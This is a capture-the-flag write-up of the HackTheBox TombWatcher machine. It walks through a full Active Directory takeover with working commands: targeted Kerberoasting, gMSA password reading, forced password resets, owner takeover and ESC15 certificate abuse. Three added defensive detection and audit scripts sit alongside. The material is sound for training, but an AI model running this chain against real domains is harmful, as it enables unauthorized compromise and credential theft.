HackTheBox TombWatcher Writeup
Machine Information
As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!
User flag
Nmap Scan
sudo nmap -Pn -T4 -A -open -p- -sC -sV -oA nmap.txt 10.10.11.72
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-06 17:30:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:55+00:00; +4h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-06T17:31:54+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:55+00:00; +4h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after: 2025-11-16T00:47:59
|_ssl-date: 2025-08-06T17:31:54+00:00; +4h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49681/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
49732/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-06T17:31:15
|_ start_date: N/A
|_clock-skew: mean: 4h00m00s, deviation: 0s, median: 3h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 166.59 ms 10.10.16.1
2 166.87 ms 10.10.11.72
After some digging around and a few tries against the various open ports, I realized BloodHound is the key to solving this box. Loading the BloodHound data, the attack path from Henry was clear: everything was ready to be exploited. Start with Shortest Paths to High Value Targets.
The attack path was clear: every user and group along the chain had the right privileges to reach the target.
Bloodhound 0x1
Started recon with BloodHound to enumerate all AD objects:
bloodhound-python -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' -gc tomb-dc.tombwatcher.htb -ns 10.10.11.72 -c all --zip
This collects all information (users, groups, sessions, ACLs, etc.) and saves it in a zip file to analyze in the BloodHound GUI.
I found that HENRY has write access to the servicePrincipalName attribute of ALFRED, which can be abused for targeted Kerberoasting.
Abuse SPN via LDAP Write Permissions
- Create an .ldif file (add_spn.ldif) that adds a fake SPN:
dn: CN=ALFRED,CN=Users,DC=tombwatcher,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: fake/alfsvc
- Add the fake SPN to ALFRED via LDAP:
ldapmodify -x -H ldap://10.10.11.72 -D "CN=HENRY,CN=Users,DC=tombwatcher,DC=htb" -w 'H3nry_987TGV!' -f add_spn.ldif
- Request a TGS ticket for that SPN:
impacket-GetUserSPNs tombwatcher.htb/HENRY:'H3nry_987TGV!' -dc-ip 10.10.11.72 -request
- Crack the TGS offline using hashcat or john to get ALFRED's password:
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Once cracked, we had access to ALFRED, one step closer to full domain compromise, and we continue with Alfred's credentials.
We run BloodHound again after each new user because it updates our attack paths based on the new permissions and group memberships, revealing new ways to escalate.
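From the defender's side, the SPN-write Kerberoast above leaves a recognisable pair of events: a servicePrincipalName change on a user object followed shortly by an RC4 service-ticket request for that account. This is an added example, not part of the original writeup; the event records are constructed and the field names are a simplified rendering of Windows Security events 5136 and 4769.

```python
# Added example (not from the writeup): correlate two constructed Windows
# Security events to spot the SPN-write Kerberoast used against ALFRED.
# 5136 (directory object modified) needs "Audit Directory Service Changes"
# plus a SACL on the user objects; 4769 (TGS requested) is logged on every DC.
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType of a ticket that hashcat -m 13100 cracks

# Constructed sample events modelled on the box: HENRY adds an SPN to
# ALFRED, then requests an RC4 service ticket for it; the AES request
# for DC01$ is ordinary traffic and must not alert.
EVENTS = [
    {"id": 5136, "time": "2025-08-06T17:40:01", "subject": "HENRY",
     "object": "CN=ALFRED,CN=Users,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "value": "fake/alfsvc"},
    {"id": 4769, "time": "2025-08-06T17:40:09", "subject": "HENRY",
     "service": "ALFRED", "etype": RC4_HMAC},
    {"id": 4769, "time": "2025-08-06T17:41:00", "subject": "henry",
     "service": "DC01$", "etype": "0x12"},
]

def cn_of(dn):
    """'CN=ALFRED,CN=Users,...' -> 'ALFRED' (upper-cased for matching)."""
    return dn.split(",")[0].split("=", 1)[1].upper()

def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Alert when a servicePrincipalName write on a user object is followed,
    within the window, by an RC4 TGS request for that same account."""
    spn_writes = [e for e in events if e["id"] == 5136
                  and e["attribute"].lower() == "serviceprincipalname"]
    alerts = []
    for w in spn_writes:
        target = cn_of(w["object"])
        for t in events:
            if t["id"] != 4769 or t["etype"] != RC4_HMAC:
                continue
            if t["service"].upper() != target:
                continue
            delta = datetime.fromisoformat(t["time"]) - datetime.fromisoformat(w["time"])
            if timedelta(0) <= delta <= window:
                alerts.append({"writer": w["subject"], "target": target,
                               "spn": w["value"], "requester": t["subject"],
                               "seconds": int(delta.total_seconds())})
    return alerts
```

The underlying fix is the ACL itself: an ordinary user should never hold write rights on another user's servicePrincipalName, and accounts that legitimately need SPNs should be AES-only so RC4 tickets stand out.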
Bloodhound 0x2
Using Alfred’s credentials, we ran BloodHound again to uncover new attack paths from his perspective.
bloodhound-python -d tombwatcher.htb -u alfred -p 'basketball' -gc tomb-dc.tombwatcher.htb -ns 10.10.11.72 -c all --zip
From Alfred's account, we had permission to add users to the INFRASTRUCTURE group. We used bloodyAD to add Alfred to it:
bloodyAD --host '10.10.11.72' -d 'dc01.TOMBWATCHER.HTB' -u 'alfred' -p 'basketball' add groupMember 'INFRASTRUCTURE' alfred
[+] alfred added to INFRASTRUCTURE
This gave us the next step in our escalation path.
If you hit Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great), it means your machine's clock is out of sync with the domain controller (the nmap scan above already showed a 4 hour skew), and Kerberos hates that. Fix it with:
sudo systemctl stop systemd-timesyncd
sudo ntpdate 10.10.11.72
This stops the system time service and manually syncs your clock with the DC (10.10.11.72), so you can get Kerberos tickets properly again.
ReadGMSAPassword on ANSIBLE_DEV$
After joining the INFRASTRUCTURE group, we gained the ReadGMSAPassword privilege on the Group Managed Service Account ANSIBLE_DEV$@TOMBWATCHER.HTB:
ldeep ldap -d "dc01.tombwatcher.htb" -u "alfred" -p "basketball" -s ldaps://10.10.11.72 gmsa
We obtained the NTLM hash of the ansible_dev$ machine account, allowing us to proceed with the next step in our attack path.
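ReadGMSAPassword is nothing more than an ACE in the DACL of the gMSA's msDS-GroupMSAMembership security descriptor, so auditing that descriptor tells you exactly who can pull the password the way ldeep did. This added example (not from the writeup) decodes such a descriptor offline; the descriptor, domain SID and RIDs are constructed placeholders, and in practice the raw bytes come from the attribute over LDAP.

```python
# Added example (not from the writeup): decode the DACL of a gMSA's
# msDS-GroupMSAMembership security descriptor to list who may read the
# managed password. The sample descriptor is constructed below; domain SID
# and RIDs are placeholders, not the box's real values.
import struct

DOMAIN = "S-1-5-21-1111-2222-3333"      # constructed domain SID
EXPECTED = {DOMAIN + "-1000"}            # e.g. the host the gMSA is meant to run on

def build_sid(text):
    """Binary SID from S-1-... text (used only to construct the sample)."""
    parts = text.split("-")[1:]
    subs = [int(p) for p in parts[2:]]
    return (struct.pack("<BB", int(parts[0]), len(subs)) + int(parts[1]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def build_sd(allowed):
    """Self-relative SD with one ACCESS_ALLOWED_ACE per SID (sample only)."""
    aces = b""
    for sid in allowed:
        body = struct.pack("<I", 0x000F01FF) + build_sid(sid)      # full-control mask
        aces += struct.pack("<BBH", 0x00, 0x00, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed), 0) + aces
    # revision, sbz1, control (SE_SELF_RELATIVE|SE_DACL_PRESENT), owner/group/sacl 0, dacl at 20
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

def sid_to_text(buf):
    rev, n = buf[0], buf[1]
    auth = int.from_bytes(buf[2:8], "big")
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in struct.unpack_from("<%dI" % n, buf, 8))

def gmsa_readers(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & 0x0004 or dacl_off == 0:
        return []
    count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    pos, readers = dacl_off + 8, []
    for _ in range(count):
        ace_type, _flags, size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == 0x00:                                 # ACCESS_ALLOWED_ACE_TYPE
            readers.append(sid_to_text(sd[pos + 8:]))        # 4-byte mask, then the SID
        pos += size
    return readers

def unexpected_readers(sd, expected=EXPECTED):
    """Any reader beyond the hosts that should use the gMSA is a finding
    (on TombWatcher that was the INFRASTRUCTURE group, here RID 1105)."""
    return [s for s in gmsa_readers(sd) if s not in expected]

SAMPLE_SD = build_sd([DOMAIN + "-1000", DOMAIN + "-1105"])
```

A group that ordinary users can be added to (as Alfred could add himself to INFRASTRUCTURE) should never appear in this list; the membership should be the service hosts only.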
Bloodhound 0x3
Again and again and again... this time with ansible_dev$:
bloodhound-python -u 'ansible_dev$' --hashes ':7bc5a56af89da4d3c03bc048055350f2' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
We discovered that ANSIBLE_DEV$@TOMBWATCHER.HTB can reset SAM’s password without needing the current one.
ANSIBLE_DEV$ Change SAM’s Password
python3 ~/Downloads/impacket/examples/changepasswd.py -dc-ip 10.10.11.72 -altuser ansible_dev$ -althash :7bc5a56af89da4d3c03bc048055350f2 -reset 'tombwatcher.htb/SAM@10.10.11.72'
When prompted, we set a new password for SAM. From here on we could use the sam account with the password we chose.
Bloodhound 0x4
This time with SAM
bloodhound-python -u 'sam' -p 'sam_pass' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
SAM Can Take Over JOHN
The user SAM@TOMBWATCHER.HTB can change the owner of JOHN@TOMBWATCHER.HTB.
ldap_shell tombwatcher.htb/SAM:sam_pass -dc-ip 10.10.11.72
# set_owner "CN=john,CN=Users,DC=tombwatcher,DC=htb"
# set_genericall "CN=john,CN=Users,DC=tombwatcher,DC=htb" sam
# change_password john NewPassword123!
[INFO] Detected insecure connection, attempting to start StartTLS...
[INFO] StartTLS successfully activated!
[INFO] Password changed successfully for "john"! New password: "NewPassword123!"
We can now take control of JOHN and request a TGT.
So, what next?
Now that we fully control JOHN@TOMBWATCHER.HTB, we discovered he can open a PSRemote session on the Domain Controller DC01.TOMBWATCHER.HTB. This gives us an interactive PowerShell session on the DC:
evil-winrm -i dc01.tombwatcher.htb -u john -p 'NewPassword123!'
Root flag
Let's check if John has anything leading to Administrator. We found AD CS, which is good but not enough on its own, so we'll look for deleted or unusual user accounts to investigate further:
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties *
We found a deleted user, cert_admin. Perfect. Let's restore the account and run BloodHound again to explore new attack paths:
Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
Now we'll use bloodyAD to remove the ACCOUNTDISABLE flag from cert_admin, reactivating the account for use:
bloodyAD -d tombwatcher.htb -u john -p 'NewPassword123!' --host 10.10.11.72 remove uac cert_admin -f ACCOUNTDISABLE
Next, we'll use bloodyAD to set a new password for cert_admin, giving us direct access to the account:
bloodyAD --host 10.10.11.72 -u john -p 'NewPassword123!' -d tombwatcher set password cert_admin HackTheBox
Let's check that the cert_admin account exists and is active.
Now, let's check if there are any vulnerable certificate templates available for exploitation:
certipy find -u 'cert_admin' -p 'HackTheBox' -dc-ip '10.10.11.72' -vulnerable -text -enabled
ESC15: Vulnerable CT Abuse
Using the vulnerable WebServer certificate template, we requested a certificate for administrator@tombwatcher.htb:
certipy req \
-u 'cert_admin@tombwatcher.htb' -p 'HackTheBox' \
-dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-upn 'administrator@tombwatcher.htb' \
-application-policies 'Client Authentication'
We authenticated with it and reset the Administrator password:
certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
This gives us full Domain Admin access.
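What made WebServer exploitable here is a combination of template settings rather than a single flag: a schema-version-1 template that lets the enrollee supply the subject, without manager approval, that a low-privileged principal can enrol in. This added example (not from the writeup or from certipy) checks those attributes on constructed template records; the enrollment principals are an assumption, not the box's real ACL.

```python
# Added example (not from the writeup): flag certificate templates with the
# ESC15 shape certipy reported on TombWatcher. Inputs are constructed dicts
# carrying the LDAP attributes of pKICertificateTemplate objects; the
# enrollment principals are an assumption, not the box's real ACL.
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag bit
PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

TEMPLATES = [  # constructed; "WebServer" mirrors the built-in v1 template
    {"name": "WebServer", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0, "enabled": True, "enroll": {"Domain Users"}},
    {"name": "WebServer-v2", "msPKI-Template-Schema-Version": 2,   # v2+: CA enforces EKUs
     "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0, "enabled": True, "enroll": {"Domain Users"}},
    {"name": "WebServer-Approved", "msPKI-Template-Schema-Version": 1,
     "msPKI-Certificate-Name-Flag": ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": PEND_ALL_REQUESTS, "enabled": True,
     "enroll": {"Domain Users"}},
]

def esc15_findings(templates):
    """Return (name, reasons) for enabled schema-version-1 templates where the
    enrollee supplies the subject, no manager approval is required and a
    low-privileged principal can enrol: the combination that lets a CSR carry
    its own application policies (e.g. Client Authentication) and a chosen UPN."""
    findings = []
    for t in templates:
        reasons = []
        if not t["enabled"] or t["msPKI-Template-Schema-Version"] != 1:
            continue
        reasons.append("schema version 1")
        if not t["msPKI-Certificate-Name-Flag"] & ENROLLEE_SUPPLIES_SUBJECT:
            continue
        reasons.append("enrollee supplies subject")
        if t["msPKI-Enrollment-Flag"] & PEND_ALL_REQUESTS:
            continue
        reasons.append("no manager approval")
        if not t["enroll"] & LOW_PRIV:
            continue
        reasons.append("low-privileged enrollment")
        findings.append((t["name"], reasons))
    return findings
```

Any of the three non-flagged shapes is a fix: duplicate the template as schema version 2 or later, require manager approval, or restrict enrollment to the principals that actually need server certificates.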